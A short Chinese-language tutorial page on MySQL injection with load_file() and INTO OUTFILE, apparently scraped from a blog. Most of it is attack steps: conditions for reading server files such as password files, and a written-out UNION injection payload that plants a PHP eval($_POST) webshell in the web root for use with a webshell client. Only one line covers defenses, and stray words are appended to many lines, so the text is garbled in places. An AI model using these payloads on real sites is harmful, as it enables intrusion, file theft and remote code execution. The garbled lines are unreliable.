web安全之sqlload_file()和into outfile()
load_file()php
條件:要有file_priv權限mysql
知道文件的絕對路徑web
能使用unionsql
對web目錄有讀權限數據庫
若是過濾啦單引號,則能夠將函數中的字符進行hex編碼網絡
步驟:函數
1.讀/etc/init.d下的東西,這裏有配置文件路徑。網站
2.獲得web的安裝路徑編碼
3.讀取密碼文件spa
into outfile
條件:
1。要有file_priv權限
2.知道網站的絕對路徑
3.對web有寫的權限
4.沒有過濾單引號
步驟:
直到網站的絕對路徑的時候:
?id=1 union select "<?php @eval($_POST['c']); ?>" into
outfile("網站根目錄")
至關於:
use test; 選擇數據庫爲test
create table aaa(bbb varchar(64)); 在數據庫中建立一個表aaa
insert into aaa values("<?php @eval($_POST['c']);?>"); 在aaa中插入一條數據<?php @eval($_POST['c']);?> select * from aaa into outfile 'C:/phpStudy/WWW/a.php'; 將aaa中的數據導出到文件a.php
drop aaa; //刪除創建的表
用菜刀練接;
防護: 數據庫鏈接賬號不能用root權限 php關閉報錯模式 mysql賬號沒有對權限對網絡根目錄有寫的權限
相關文章
- 1. sql注入之文件寫入into outfile
- 2. MySQL邏輯備份into outfile
- 3. MySQL select into outfile用法
- 4. Mysql select into outfile 命令
- 5. MySQL into outfile secure-file-priv
- 6. Mysql 使用 select into outfile
- 7. select into outfile access deny問題
- 8. SELECT ... INTO OUTFILE中面臨的secure_file_priv問題
- 9. sqli-labs Less-21 POST-Dump into outfile-String
- 10. 使用sql語句導出excel INTO OUTFILE
- 更多相關文章...
- • ASP.NET MVC - 安全 - ASP.NET 教程
- • MySQL數據庫備份(INTO OUTFILE) - MySQL教程
- • Composer 安裝與使用
- • Tomcat學習筆記(史上最全tomcat學習筆記)
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. sql注入之文件寫入into outfile
- 2. MySQL邏輯備份into outfile
- 3. MySQL select into outfile用法
- 4. Mysql select into outfile 命令
- 5. MySQL into outfile secure-file-priv
- 6. Mysql 使用 select into outfile
- 7. select into outfile access deny問題
- 8. SELECT ... INTO OUTFILE中面臨的secure_file_priv問題
- 9. sqli-labs Less-21 POST-Dump into outfile-String
- 10. 使用sql語句導出excel INTO OUTFILE